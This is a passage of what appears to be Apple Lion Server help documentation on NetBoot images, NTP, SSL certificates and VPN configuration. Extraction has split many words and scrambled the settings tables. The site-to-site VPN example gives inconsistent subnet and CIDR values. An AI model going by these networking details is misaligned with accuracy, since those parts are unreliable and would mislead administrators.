3. Select the image and click Convert. 4. In the Save As field, enter a name. 5. Select a different location to s ave the image to. For example, s ave the image on the Desktop folder. 6. From the Image Format menu, choose read/write. 7. Click Save. 8. Unmount the image. 9. Mount the new image in the Finder. 10. Open a Terminal window and enter the following to rename the image: $ sudo diskutil rename /Volumes/imagenew_name Replace image with the name of the image to rename and new_name with the new name of the image. 11. When prompted, enter your administrator pas sword. The name of the image changes. 12. Unmount the image. 13. Remount the image to verify that the image is renamed. 14. Unmount the image. 15. Remove the original image from the .nbi folder and s tore it s omewhere els e. 16. In Dis k Utility, s elect the new image and click Convert. 17. Give the image the s ame name as the one it had inside the .nbi folder. 18. In the Where field, select the .nbi folder. 19. From the Format menu, choose Compres sed. 20. Click Save. 21. Test the new image to make sure it mounts properly. 22. Discard the old image.
Netw ork Time Protocol (NTP)
About NTP
Using NTP s ervice for time synchronization is important for reducing confusion that can be caus ed if time s tamps are out of sync. From shared file s ystems to billing services, correct timekeeping is a neces sity. However, clocks on computers throughout a network can have widely different time s tamps. Network Time Protocol (NTP) synchronizes the clocks in networked computers to a reference clock. NTP helps make sure that all computers on a network report the same time. If an isolated network (or even a computer) is unsynchronized, services that use time and date s tamps (s uch as Mail service, or Web service with timed cookies) s end wrong time and date stamps and are out of sync with other computers across the Internet. For example, a mail message could arrive minutes or years before it was sent (according to the time stamp), and a reply to that mess age could come before the original was sent. How NTP works NTP us es Univers al Time Coordinated (UTC) as its reference time. UTC is bas ed on an atomic res onance, and clocks that run according to UTC are often referred to as atomic clocks. On the Internet, authoritative NTP servers (known as Stratum 1 servers ) track the current UTC time. Other s ubordinate s ervers (known as Stratum 2 and 3 s ervers) regularly query Stratum 1 s ervers and estimate the time taken to send and receive the query. They then factor this estimate with the query result to s et the Stratum 2 or 3 servers time. The estimates are correct to the nanosecond.
Your LAN can then query Stratum 3 servers for the time. An NTP client computer on your network then takes the UTC time reference and converts it using its own time zone setting to local time, and sets its internal clock accordingly. NTP on your network Lion Server can act as an NTP client, receiving authoritative time from an Internet time server, and as an authoritative time server for a network. Your local clients can query your server to set their clocks. If you set your server to ans wer time queries, set it to als o query an authoritative time server on the Internet. Find more information about NTP The working group, documentation, and FAQ for NTP can be found at www.ntp.org. Listings of publicly accessible NTP servers and their use policies can be found at s upport.ntp.org/bin/view/Servers/WebHome. Request for Comments (RFC) documents provide an overview of a protocol or service and details about how the protocol should behave. If youre a novice s erver administrator, youll probably find some of the background information in an RFC helpful. If youre an experienced s erver administrator, you can find all technical details about a protocol in its RFC document. You can search for RFC documents by number at www.ietf.org/rfc.html. The official s pecification of NTP is RFC 1305.
RELATED TOPICS
Configure NTP service on clients Set up NTP service
Configure NTP service on clients

If you have a local time server, you can configure clients to query your time server for the network date and time. By default, clients can query Apples time server. Use the following instructions to set your clients to query your time server.
1. Open Sys tem Preferences. 2. Click Date & Time. 3. Select the Set date & time automatically checkbox. 4. Select and delete the text in the field rather than using the pop-up menu. 5. Enter the hos t name of your time server. Your host name can be a domain name (such as time.example.com) or an IP addres s. 6. Close System Preferences.
RELATED TOPIC
About NTP
Set up NTP service

If you run NTP service on your network, make sure your designated NTP server can access a higher-authority time s erver. Apple provides a Stratum 2 time server for cus tomer us e at time.apple.com. Make sure your firewall permits NTP queries to an authoritative time server on UDP port 123, and that it als o permits incoming queries from local clients on the same port.
2. Click Settings, then click Date & Time. 3. Make sure your s erver is configured to Set date & time automatically. 4. From the pop-up menu, choose the server to act as a time s erver. 5. Click General. 6. Select the Network Time Server (NTP) checkbox. 7. Click Save.
RELATED TOPIC
About NTP
SSL Certificates
Replace certificates
If you've as signed a certificate to a particular service, or to all services as a group, you can replace those certificates. You might replace the default self-signed certificate with one that's been s igned by a third-party, or you might need to replace an expired certificate. See Obtaining a Signed Certificate . If you receive a s igned certificate from a third-party, it should have an extension of .cer, .crt, or .p12.
RELATED INFORMATION
Obtain a CAs igned certificate
SSL Certificates
Create a self-signed certificate

If your server does nt have an SSL certificate or if you need another one, start by creating a self-s igned certificate.
1. Select the server under Hardware in the Server app s idebar. 2. Click Settings and then click the Edit button at the right of SSL Certificate. 3. From the Action pop-up menu, choose Manage Certificates. 4. Click the Add button (+) and choose Create Self-Signed Certificate from the pop-up menu. 5. In the Name field of the Certificate Ass is tant, enter your s erver's fully qualified host name (for example, server.example.com) and click Continue. Leave the other settings unchanged. Identity Type s hould be Self Signed Root, Certificate Type s hould be SSL Server, and Let me override defaults s hould be deselected. You can choos e the new self-s igned certificate for the server. For information, see Using an SSL certificate. You can also use the new self-signed certificate to reques t a signed certificate from a certificate authority. For instructions, see Obtain a signed certificate.
SSL Certificates
Import a certificate identity

If you have files containing an SSL certificate and matching private key, you can import them and then use the certificate to secure services provided by your s erver. The SSL keys and certificates must be in Privacy Enhanced Mail (PEM) format. If your certificates and keys arent in PEM format, you must convert them.
1. In the Finder, locate the files containing the certificate and matching private key, and put the files where you can s ee them while using Server Preferences (for example, on the des ktop). 2. In the Server app, select your server's name under Hardware in the Server app s idebar. 3. In the Settings pane, click the Edit button at the right of SSL Certificate. 4. From the Action pop-up menu, choose Manage Certificates. 5. Click + and then choose Import a Certificate Identity from the menu. 6. Drag the files containing the certificate and private key to the middle of the dialog. 7. Click the Import button and if prompted, enter the private key pass phrase.
SSL Certificates
Obtain a CAsigned certificate

If your server requires a s igned SSL certificate, use a self-signed certificate to reques t a signed certificate from an external certificate authority (CA). To obtain a s igned certificate from a CA, you need a self-s igned certificate. For instructions on creating a self-s igned certificate, see Create a s elf-signed certificate. You can obtain a valid s igned certificate by us ing the s ervers self-signed certificate to generate a certificate signing request (CSR) file, which you send to a known CA. If your request satisfies the authority, it generates and sends you a signed certificate. There is usually a fee involved with this service.
1. Select the server under Hardware in the Server app s idebar. 2. Click Settings and then click the Edit button at the right of SSL Certificate. 3. From the Action pop-up menu, choose Manage Certificates. 4. In the Manage Certificates s heet, s elect the self-s igned certificate you want to use to generate the CSR. 5. From the Action pop-up menu, choose Generate Certificate Signing Request (CSR). 6. Save the CSR file. Some certificate authorities ask you to enter the CSR text in a field on a webpage instead of uploading a file. In that case, you can copy and paste the text to the CA's website. 7. Upload the CSR file to a CA following the instructions on their webs ite. On the CA's website, look for SSL Certificates. You can use the CA of your choice. Here are a few CAs : Thawte, Inc. (www.thawte.com) VeriSign, Inc. (www.verisign.com) Comodo Group, Inc. (www.comodo.com) After receiving your signed certificate from the CA, you can use it to replace your self-signed certificate. For information, see Use an SSL certificate.
SSL Certificates
Use an SSL certificate

Your server can use an SSL certificate to provide additional security for s ervices . The s erver can us e an SSL certificate to identify itself electronically and communicate s ecurely with users computers and other servers on the local network and the Internet. The SSL certificate provides additional security for Addres s Book, iCal, iChat, mail, and web services. Thes e s ervices can us e the certificate to securely encrypt and decrypt data they s end to and receive from
applications on users computers. You can us e the s elf-signed certificate created for your s erver when you set it up, or a s elf-signed certificate you created, but users applications wont trust these and will display mes sages asking if the user trus ts your certificate. Using a signed certificate relieves us ers from the uncertainty and tedium of manually accepting your certificate in these mess ages. A man-in-the-middle spoofing attack is pos sible with a self-s igned certificate, but not with a signed certificate, and that means users can trust the services they access.
1. Select the server under Hardware in the Server app s idebar. 2. Click Settings and then click the Edit button at the right of SSL Certificate. 3. From the Action pop-up menu, choose an available certificate. If the pop-up menu doesnt contain certificates, create a self-s igned certificate. For instructions , see Create a s elf-signed certificate. To use a previously generated SSL certificate, import it.
RELATED INFORMATION
Obtain a CAs igned certificate Replace certificates
VPN
About VPN
About VPN
VPN (virtual private network) service lets remote us ers connect to your intranet over the Internet. VPN (virtual private network) service lets us ers connect to your intranet from home or other remote locations over the Internet. Users make a secure VPN connection to acces s services you havet made public on the Internet. For example, organizations typically make file s haring available only on their own intranets, requiring their remote users to connect using VPN to access s hared files . VPN service and your servers firewall can both allow access to s ervices from outside your intranet. The difference is that VPN service requires authentication for access, but allowing access through the firewall does nt require authentication. If VPN service is on, you dont need to expos e some services to the Internet through your firewall. For example, you might set the firewall to expose only your web services to the Internet, so the public can view your wikis and custom websites (subject to authentication and access restrictions you impose). Your servers us ers can acces s other servicesfile sharing, Address Book, iCal, iChat, and mail through a VPN connection. To ensure confidentiality, authentication, and communications integrity, VPN s ervice us es the L2TP protocol with a shared secret. The s hared secret is like a pas sphras e, but it isnt used to authenticate client computer us ers for a VPN connection. Instead, it allows the server to trus t client computers that have the shared secret, and it allows client computers to trust the s erver that has the secret. Both server and client computers must have the shared secret. Users computers must be configured to make VPN connections. Us ers computers with Mac OS X Lion can be configured automatically. For information, see Provide secure remote access with VPN. If you want to allow acces s to VPN service on the Internet and you have a cable router, DSL router, or other network router: Your router mus t have port forwarding (port mapping) configured for VPN service. For information about port forwarding, see Port mapping for network and server protection. Your router and VPN us ers routers must be configured so that they dont as sign conflicting IP addres ses. For information, see Provide VPN s ervice through an Internet router. If you want to allow acces s to VPN service outside your intranet and your intranet has a separate firewall device, ask the firewall administrator to open the firewall for the ports and protocols that VPN service uses. For a list of ports, s ee Services and ports.
VPN
About VPN
VPN and security

VPNs s tress s ecurity by requiring strong authentication of identity and encrypted data trans port between the nodes for data privacy and dependability.
The following sections contain information about each s upported transport and authentication method.
Transport protocols
There are two encrypted transport protocols : Layer Two Tunneling Protocol, Secure Internet Protocol (L2TP/IPSec), and Pointto Point Tunneling Protocol (PPTP). You can enable either or both protocols. Each has its own strengths and requirements. L2TP/IPSec L2TP/IPSec us es strong IPSec encryption to tunnel data to and from network nodes . It is bas ed on Ciscos L2F protocol. IPSec requires security certificates (self-s igned or signed by a certificate authority s uch as Veris ign) or a predefined shared secret between connecting nodes . The s hared secret mus t be entered on the server and the client. The s hared secret is not a pas sword for authentication, nor does it generate encryption keys to es tablish s ecure tunnels between nodes. It is a token that the key management sys tems use to trus t each other. L2TP is Mac OS X Servers preferred VPN protocol becaus e it has superior transport encryption and can be authenticated using Kerberos . PPTP PPTP is a commonly used Windows standard VPN protocol. PPTP offers good encryption (if s trong pass words are used) and supports a number of authentication s chemes. It uses the us er-provided password to produce an encryption key. By default, PPTP s upports 128-bit (s trong) encryption. PPTP als o supports the 40-bit (weak) security encryption. PPTP is neces sary if you have Windows clients with versions earlier than Windows XP or if you have Mac OS X v10.2.x clients or earlier.
Authentication method
Mac OS X Server L2TP VPN uses Kerberos v5 or Microsofts Challenge Handshake Authentication Protocol version 2 (MS-CHAPv2) for authentication. Mac OS X Server PPTP VPN exclusively uses MS-CHAPv2 for authentication. Kerberos is a secure authentication protocol that uses a Kerberos Key Distribution Server as a trusted third party to authenticate a client to a server. MS-CHAPv2 authentication encodes passwords when theyre s ent over the network, and s tores them in a scrambled form on the server. This method offers good security during network trans mis sion. It is also the s tandard Windows authentication s cheme for VPN. A Mac OS X Server PPTP VPN can also use other authentication methods. Each method has its own strengths and requirements. These other authentication methods for PPTP are not available in Server Admin.
VPN service with a third-party LDAP domain

To us e VPN service for users in a third-party LDAP domain (an Active Directory or Linux OpenLDAP domain), you must be able to use Kerberos authentication. If you need to use MSCHAPv2 to authenticate us ers, you cant offer VPN s ervice for users in a thirdparty LDAP domain.
VPN
About VPN
More information about L2TP/IPsec

The Internet Engineering Tas k Force (IETF) developed formal s tandards for L2TP/ IPsec user authentication. Request for Comments (RFC) documents provide an overview of a protocol or service and details about how the protocol should behave. If youre a novice s erver administrator, youll probably find some of the background information in an RFC helpful. If youre an experienced s erver administrator, you can find all technical details about a protocol in its RFC document. You can search for RFC documents by number at the website www.ietf.org/rfc.html. For L2TP description, s ee RFC 2661. For IPs ec, see RFC 4301 and 4309.
For PPTP description, s ee RFC 2637. For Kerberos vers ion 5, s ee RFC 1510.
VPN
Manage VPN
Provide secure remote access with VPN

You can us e the Server app to turn on VPN service and customize its s ettings. VPN (virtual private network) service lets users connect to your intranet from home or other remote locations over the Internet. Users make a secure VPN connection to access s ervices you havet made public on the Internet. For example, organizations typically make file sharing available only on their own intranets, requiring their remote users to connect using VPN to access shared files. Start VPN service 1. In the Server app s idebar, s elect the service you want to start. 2. Click the On/Off switch to turn on the service. 3. If a dialog asks whether you want to allow Internet acces s to the s ervice you turned on, click Allow to configure your AirPort device and make the service acces sible to Internet users. Click Dont Allow if you dont want the service to be access ible to computers on the Internet, or if youre not sure. You can change Internet acces s to s ervices later by selecting your AirPort device in the Server sidebar. For more information, see Manage AirPort port mapping and Wi-Fi login. The dialog appears only if your AirPort device is listed in the Server sidebar and you turned on a service that the Server app can manage on your AirPort device.Thes e services include Address Book, iCal, iChat, Mail, and Web. If you have an Internet router that is nt lis ted in the Server s idebar, you can configure it to allow Internet access to services. This process is called port forwarding or port mapping. For Information, see Router port mapping. Start VPN service from the command line You can start VPN s ervice from the command line. Open Terminal (located in /Applications/Utilities /), and enter: $ sudo serveradmin start vpn For information about serveradmin, see its man page. Change the VPN shared secret You can us e the Server app to change the s hared secret that the server and a client computer use for authentication when making a VPN connection. Periodically changing the shared secret improves VPN security but is inconvenient, because users must also change the s hared secret on computers they use for VPN connections . 1. In the Server app s idebar, s elect VPN and then enter a new secret. The shared s ecret should be at least 8 characters (preferably 20 or more) and can include any character you can type. Initially, the shared secret is 20 random characters. The maximum length is 256 UTF-8 characters, and surplus characters are ignored. You can use Pas sword Ass is tant to help you compose a new shared s ecret. Select Users in the s idebar, choose Reset Pas sword from the Action pop-up menu, click the Key button to the right of the New Pas sword field, and then click Cancel and select VPN again in the sidebar. Pas sword Ass istant remains open, and you can use it to generate a new shared secret that you copy from the Sugges tion field and paste into the Shared Secret field. 2. If you want to verify the s ecret, s elect Show shared secret. After you change the s ecret on the server, all VPN us ers must make the same change in their VPN configurations.
Change the IP address range for VPN
Change the IP address range for VPN You can us e the Server app to change the range of address es you want the server to res erve for assigning to remote computers when they make a VPN connection to the server. For example, you might make the range larger to make more IP addresses available for VPN connections. 1. In the VPN pane of the Server app, change the first or las t IP addres s in the range. Important: These addresses on the servers network mus t not be used by other computers or devices on the network. This range of addresses must not include any static IP addresses in use on the network and must not overlap the range of IP addresses that the DHCP s erver assigns. The range of addres ses needs to be large enough for the maximum number of remote computers with concurrent VPN connections. VPN service assigns an IP address to a remote computer for the duration of a VPN connection. When the remote computer disconnects, VPN service reclaims the IP address. 2. If you have an Internet router that provides DHCP service, such as an AirPort Extreme Base Station (802.11n) or Time Capsule, you may need to adjust its IP address range so that the DHCP and VPN addres s ranges dont overlap. To configure an AirPort Base Station, use AirPort Utility (in the Utilities folder in Launchpad). For information about changing the settings of an Internet router, see its documentation. The IP address that VPN service assigns to a remote computer for its VPN connection doesnt replace the IP address that the remote computer is already us ing to connect to the Internet. The remote computer keeps this IP addres s and any other IP addresses its using, and adds the IP addres s assigned to it for VPN. Create a VPN configuration profile You can us e the Server app to create a configuration profile that s ets up Macs and iOS devices for your VPN service. After users open the profile, they can make a VPN connection to your server and intranet via the Internet. 1. In the Server app s idebar, s elect VPN, and then click Save Configuration Profile. 2. Specify a filename and location for the configuration profile, enter the hos t name or IP addres s of your server on the Internet, and then click Save. The host name is the full, unique name that you registered with your domain name registrar, such as server.example.com. For more information, see Register the servers Internet hos t name. After you create a profile, you can have users install it on Macs and on iOS devices such as iPhone, iPad, and iPod touch. Distribute the profile to users by email, or post it to a webs ite. When us ers open the email attachment or the downloaded profile, they're prompted to start the installation proces s. You can also distribute profiles over the network directly to iOS devices and Macs by us ing Profile Manager. For information, see Provide user configuration profiles .
Note: While VPN s ervice is turned on, make s ure the server is nt configured to use the Back to My Mac option of MobileMe. The server isnt using this option unles s its signed in to a MobileMe account and Back to My Mac is turned on in the MobileMe pane of Sys tem Preferences. VPN service and "Back to My Mac" conflict because both need to us e UDP port 4500.
RELATED TOPICS
About VPN Provide VPN service through an Internet router Stop VPN service from the command line Control a users access to services
VPN
Manage VPN
Provide VPN service through an Internet router

If you have an Internet router, users who als o have Internet routers cant access your VPN service if their intranet addres ses begin with the same three numbers as yours. For example, if your s ervers IP address is 192.168.1.101, us ers cant access your VPN service from other intranets with addres ses that begin 192.168.1. Ask users to change their intranet addresses
You can ask VPN us ers to change the IP addresses on their home networks to not begin with the same three numbers as the IP addres ses on your intranet. For example, if your intranet IP addresses begin 192.168.1, ask VPN users to use IP addresses beginning with 192.168.2 on their home networks . Private networks can use addresses beginning with 192.168.0 through 192.168.254, 10.0.0 through 10.254.254, and 172.16.0 through 172.31.254. In all cases, use subnet mask 255.255.255.0. Change your intranet addresses To avoid conflicts with VPN users IP address es, you can use an uncommon IP addres s range on your intranet. Change the IP addresses of your s erver and all other devices on your intranet to not use the most common defaults on Internet routers , which are 10.0.1, 192.168.0, and 192.168.1. You can s imply pick a different number between 2 and 254 for the third number of your intranet IP addresses. For example, if your intranet IP addres ses begin with 192.168.1, change them to begin with 192.168.58 or 192.168.177. If your intranet IP addresses begin with 10.0.1, change them to begin with 10.0.29 or 10.0.103. You can als o use 172.16.0 through 172.31.255. In all cases , us e subnet mask 255.255.255.0. Be s ure to change the IP addresses that your Internet router or other DHCP server assigns to computers on your intranet. If you have an AirPort Extreme Base Station (802.11n) or a Time Capsule, us e AirPort Utility (located in the Utilities folder in Launchpad). For instructions, s ee AirPort Utility Help. For information about configuring another kind of Internet router, see its documentation.
RELATED TOPICS
About VPN Find or change your s ervers IP address
VPN
Manage VPN
Change L2TP settings

You can enable or dis able the L2TP protocol and change its settings from the command line. You mus t designate an IPSec shared secret (if you dont use a signed security certificate), the IP address allocation range for users , and the group that uses the VPN service (if needed). If L2TP and PPTP are used, each protocol should have a separate, nonoverlapping address range. When configuring VPN, make sure the firewall allows VPN traffic on needed ports with the following s ettings: For the any address group, enable GRE, ESP, VPN L2TP (port 1701), and VPN ISAKMP/ IKE (port 500). For the 192.168-net addres s group, choose to allow all traffic.
1. Open Terminal (located in /Applications/Utilities /), and enter: $ sudo serveradmin settings Authenticate if requested. When you run this command, you no longer see the command-line prompt, but you can enter server settings to change them. 2. Enter the following: vpn:Servers:com.apple.ppp.l2tp:enabled = yes vpn:Servers:com.apple.ppp.l2tp:IPv4:DestAddressRanges:_array_index:0 = value vpn:Servers:com.apple.ppp.l2tp:IPv4:DestAddressRanges:_array_index:1 = value vpn:Servers:com.apple.ppp.l2tp:Server:LoadBalancingEnabled = value vpn:Servers:com.apple.ppp.l2tp:Server:LoadBalancingAddress = value vpn:Servers:com.apple.ppp.l2tp:PPP:AuthenticatorProtocol:_array_ index:0 = value vpn:Servers:com.apple.ppp.l2tp:PPP:AuthenticatorPlugins:_array_index:0 = value vpn:Servers:com.apple.ppp.l2tp:Radius:Server:_array_index:0:Address = value
vpn:Servers:com.apple.ppp.l2tp:Radius:Server:_array_ index:0:SharedSecret = value vpn:Servers:com.apple.ppp.l2tp:Radius:Server:_array_index:1:Address = value vpn:Servers:com.apple.ppp.l2tp:Radius:Server:_array_ index:1:SharedSecret = value vpn:Servers:com.apple.ppp.l2tp:IPSec:AuthenticationMethod = value vpn:Servers:com.apple.ppp.l2tp:L2TP:IPSecSharedSecretValue = value vpn:Servers:com.apple.ppp.l2tp:IPSec:LocalCertificate = value The settings you entered follow:
Setting (in v pn:Serv ers:com.apple.ppp.l2tp:) Default Set this to
enabled IPv4:DestAddressRanges Server:LoadBalancingEnabled Server:LoadBalancingAddress
no _empty_array 0 1.2.3.4
yes
value value value value
PPP:AuthenticatorProtocol:_array_ "MSCHAP2" index:n PPP:AuthenticatorPlugins:_array_ "DSAuth" index:n Radius:Server:_array_ index:0:Address Radius:Server:_array_ index:0:SharedSecret Radius:Server:_array_ index:0:Address Radius:Server:_array_ index:0:SharedSecret IPSec:AuthenticationMethod L2TP:IPSecSharedSecretValue IPSec:LocalCertificate "SharedSecret" "" "" 2 2.2.2.2 1 1.1.1.1
value
value
value
value
value
value value value
3. When you finish changing s ettings, hold down the Control key and press D.
VPN
Manage VPN
Change PPTP settings

You can enable or dis able the PPTP protocol and change its settings from the command line. You s hould designate an encryption key length (128 bit recommended for bes t transport security), the IP address allocation range for your clients , and the group that uses the VPN service (if needed). If you enable PPTP, make sure all VPN clients support 128-bit PPTP connections for greates t transport security. Using only 40-bit transport s ecurity is a serious security risk. If you use L2TP and PPTP, each protocol should have a separate, nonoverlapping address range. When configuring VPN, make sure the firewall allows VPN traffic on needed ports with the following s ettings: For the any address group, enable GRE, ESP, VPN L2TP (port 1701), and IKE (port 500).
For the 192.168-net addres s group, choose to allow all traffic.
1. Open Terminal (located in /Applications/Utilities /), and enter: $ sudo serveradmin settings Authenticate if requested. When you run this command, you no longer see the command-line prompt, but you can enter server settings to change them. 2. Enter the following: vpn:Servers:com.apple.ppp.pptp:enabled = yes vpn:Servers:com.apple.ppp.pptp:IPv4:DestAddressRanges:_array_index:0 = value vpn:Servers:com.apple.ppp.pptp:IPv4:DestAddressRanges:_array_index:1 = value vpn:Servers:com.apple.ppp.pptp:PPP:AuthenticatorProtocol:_array_ index:0 = value vpn:Servers:com.apple.ppp.pptp:PPP:AuthenticatorPlugins:_array_index:0 = value vpn:Servers:com.apple.ppp.pptp:Radius:Server:_array_index:0:Address = value vpn:Servers:com.apple.ppp.pptp:Radius:Server:_array_ index:0:SharedSecret = value vpn:Servers:com.apple.ppp.pptp:Radius:Server:_array_index:1:Address = value vpn:Servers:com.apple.ppp.pptp:Radius:Server:_array_ index:1:SharedSecret = value vpn:Servers:com.apple.ppp.pptp:PPP:MPPEKeysize40 = value vpn:Servers:com.apple.ppp.pptp:PPP:MPPEKeysize128 = value The settings you entered follow:
Setting (in v pn:Serv ers:com.apple.ppp.pptp:) Default Set this to
enabled IPv4:DestAddressRanges
no _empty_array
yes
value value
PPP:AuthenticatorProtocol:_array_ MSCHAP2 index:n PPP:AuthenticatorPlugins:_array_ DSAuth index:n Radius:Server:_array_ index:0:Address Radius:Server:_array_ index:0:SharedSecret Radius:Server:_array_ index:0:Address Radius:Server:_array_ index:0:SharedSecret PPP:MPPEKeysize40 PPP:MPPEKeysize128 0 0 2 2.2.2.2 1 1.1.1.1
value
value
value
value
value
value value
3. When you finish changing s ettings, hold down the Control key and press D.
VPN
Manage VPN
Limit VPN access to specific IP addresses

You limit access to the VPN by using Firewall s ervice.
When configuring the firewall for L2TP and PPTP, you must configure GRE, ESP, and IKE to permit VPN access through the firewall. By default, Firewall service blocks incoming VPN connections , but you can provide limited VPN acces s to s pecific IP addresses for security or eas e of adminis tration.
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select Firewall. 4. Click Settings. 5. Select Advanced, then click the Add button (+). 6. From the Action pop-up menu, choose Allow. 7. From the Protocol pop-up menu, choose an option. If you use L2TP for VPN access , choose UDP. If you use PPTP for VPN access, choose TCP. 8. From the Service pop-up menu, choos e VPN L2TP or VPN PPTP. The relevant des tination port is added to the Port field. 9. (Optional) Select the Log all packets matching this rule checkbox. 10. From the addres s pop-up menu of the Source section, choose Other and enter the source IP address range (using CIDR notation) that you want to give access to the VPN. You can also s pecify a port in the Port field of the Source section. Computers that have an IP address in the IP address range that you specified in the source IP address field, communicating on the s ource port you s pecified, can connect to the VPN s ervice. 11. From the Destination Address pop-up menu, choose the address group that contains the VPN s erver (for the destination of filtered traffic). If you dont want to use an existing addres s group, select Other and enter the destination IP address range (with CIDR notation). You can also s pecify a port in the Port field of the Source section. 12. From the Interface pop-up menu that this rule applies to, choose In. In refers to the packets coming into the s erver. 13. Click OK. 14. Click the Add button (+). 15. From the Action pop-up menu, choose Allow. 16. From the Protocol pop-up menu, choose a protocol or Other: If you are adding GRE or ESP, choos e Other and enter any in the field. If you are adding VPN ISAKMP/IKE, choose UDP. 17. From the Service pop-up menu, choos e a service: If you are adding GRE, choos e GRE - Generic Routing Encapsulation protocol. If you are adding ESP, choose ESP - Encapsulating Security Payload protocol. If you are adding VPN ISAKMP/IKE, choose VPN ISAKMP/IKE. Destination port 500 is added to the Port field. 18. From the Addres s pop-up menu of the Source section, choose any. 19. In the Port field of the Source section, enter any.
20. From the Addres s pop-up menu of the Destination section, choos e any. 21. In the Port field of the Des tination s ection, enter a port number. If you are adding VPN ISAKMP/IKE, enter 500 if it is not shown. 22. From the Interface pop-up menu, choose Other and enter any in the Other field of the Interface section. 23. Click OK. 24. Repeat steps 14 through 23 for GRE, ESP, and VPN ISAKMP/IKE. 25. Click Save to apply the filter immediately.
VPN
Manage VPN
View VPN status

You can view VPN s tatus information by using the serveradmin command-line tool. You can see whether the L2TP and PPTP protocols are enabled, how many clients are connected, when the service started, and where log files are located. For information about serveradmin, see its man page. View VPN status Open Terminal (located in /Applications/Utilities /), and enter: $ sudo serveradmin status vpn
View detailed VPN status Open Terminal (located in /Applications/Utilities /), and enter: $ sudo serveradmin fullstatus vpn
VPN
Manage VPN
View the VPN log

You can monitor the VPN log from the command line. Monitoring VPN logs helps you make sure your VPN is running properly. VPN logs can help you troubleshoot problems. For information about tail, see its man page. View a VPN log Open Terminal (located in /Applications/Utilities /), and enter: $ tail log-file
View the log path Open Terminal (located in /Applications/Utilities /), and enter: $ sudo serveradmin command vpn:command = getLogPaths
VPN
Manage VPN
Link remote networks

You can us e a VPN to link a computer to a main network, and you can also link networks.
When two networks are linked they can interact as if they are physically connected. Each site must have its own connection to the Internet but the private data is sent encrypted between the s ites . This type of link is useful for connecting satellite offices to an organizations main office LAN. Linking multiple remote LAN sites to a main LAN requires using the s2svpnadmin command-line utility to administer s ite-to-site VPN. To us e s2svpnadmin you need root privilege access through sudo. For more about s2svpnadmin, see the s2svpnadmin man page. Linking multiple remote LAN sites to a main LAN can require the creation of a security certificate. The s2svpnadmin tool can create links using s hared-secret authentication (both sites have a pas sword in their configuration files) or certificate authentication. To use certificate authentication, you must create the certificate before running s2svpnadmin. You can only make site-to-site VPN connections using L2TP/IPSec VPN connections. You cannot link two sites us ing PPTP and these ins tructions . This example uses the following s ettings:
Setting Desired VPN type Authentication Shared secret Internet or public IP address of the VPN main LAN gateway (Site 1) Internet or public IP address of the VPN remote LAN gateway (Site 2) Private IP address of site 1 Private IP address of site 2 Private network IP address range and netmask for site 1 Description or example L2T P Using shared secret prDwkj49fd!254 A.B.C.D W.X.Y.Z 192.168.0.1 192.168.20.1 192.168.0.0192.168.0.255 (also expressed as 192.168.0.0/16 or 192.168.0.0:255.255.0.0) Private network IP address range and netmask for site 2 192.168.20.0 192.168.20.255 (also expressed as 192.168.20.0/24 or 192.168.0.0:255.255.0.0) Organizations DNS IP address 192.168.0.2
The result of this configuration is an auxiliary, remote LAN, connected to a main LAN using L2TP. Run s2svpnadmin on both site gateways 1. Open Terminal (located in /Applications/Utilities /), and enter: $ sudo s2svpnadmin 2. Enter the relevant number for Configure a new site-to-site s erver. 3. Enter an identifying configuration name (no spaces ). For this example, you could enter site_1 on site 1s gateway, and so on. 4. Enter the gateways public IP addres s. For this example, enter A.B.C.D on site 1s gateway and W.X.Y.Z on site 2s gateway. 5. Enter the other sites public IP address. For this example, enter W.X.Y.Z on site 1s gateway and A.B.C.D on site 2s gateway. 6. Enter s for shared secret authentication, and enter the shared secret prDwkj49fd!254. If you are using certificate authentication, enter c and choose the ins talled certificate you want to us e. 7. Enter at least one addressing policy for the configuration. 8. Enter a local subnet network address (for example, 192.168.0.0 for site 1 and 192.168.20.0 for s ite 2).
9. For the address range, enter the prefix bits in CIDR notation. In this example, the CIDR notation for the subnet range is 192.168.2.0/24 for s ite 1, so you enter 24. 10. Enter a remote s ubnet network addres s (for example, 192.168.20.0 for site 1 and 192.168.0.0 for site 2). 11. For the address range, enter the prefix bits in CIDR notation. In this example, the CIDR notation for the subnet range is 192.168.2.0/24 for s ite 1, so you enter 24. 12. If you have more addres sing policies, enter them now; otherwise, press Return. If you had more sites to connect or a more complex address s etup (linking only parts of your main LAN and the remote LAN), you would make more address ing policies for this site configuration now. Repeat steps 7 through 12 for each new address ing policy. 13. Press y to enable the site configuration. You can verify your settings by choos ing to s how the configuration details of the server and entering the configuration name (in this example, site_1). 14. Exit s2svpnadmin. Configure the firewall on both site gateways 1. Create an address group for each server with only the servers public IP address. In this example, name the firs t group Site 1 and enter the public IP address of the server. Then name the second group Site 2 and enter the public IP address of the other server. 2. Open the firewall to external VPN connections by enabling L2TP (port 1701) connections and IKE NAT Traversal (port 4500) in the any address group. 3. Create the following Advanced IP filter rules on both site gateways:
Filter Rule 1 Action: Protocol: Source Address: Destination Address: Interface: Setting Allow UDP Site 1 Site 2 Other; enter isakmp
Filter Rule 2 Action: Protocol: Source Address: Destination Address: Interface:
Setting Allow UDP Site 2 Site 1 Other; enter isakmp
Filter Rule 3 Action: Protocol: Source Address: Destination Address:
Setting Allow Other; enter esp Site 1 Site 2
Filter Rule 4 Action:
Setting Allow
Protocol: Source Address: Destination Address:
Other; enter esp Site 2 Site 1
Setting Allow Other; enter ipencap Site 1 Site 2
Setting Allow Other; enter ipencap Site 2 Site 1
Setting Allow Other; enter gre Site 1 Site 2
Setting Allow Other; enter gre Site 2 Site 1
These rules permit the encrypted traffic to be passed to both hosts. 4. Save your changes. 5. Start or restart the firewall, as needed. Start VPN service on both site gateways 1. For both VPN gateways, open Server Admin and connect to the server. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. Select VPN from the expanded Servers list. If you used s2svpnadmin correctly, the Start button should be enabled and ready to use. 4. Click Start VPN. You should now be able to acces s a computer on the remote LAN from the local LAN. To verify the link, use ping or some other means.
Push Notification
About push notification

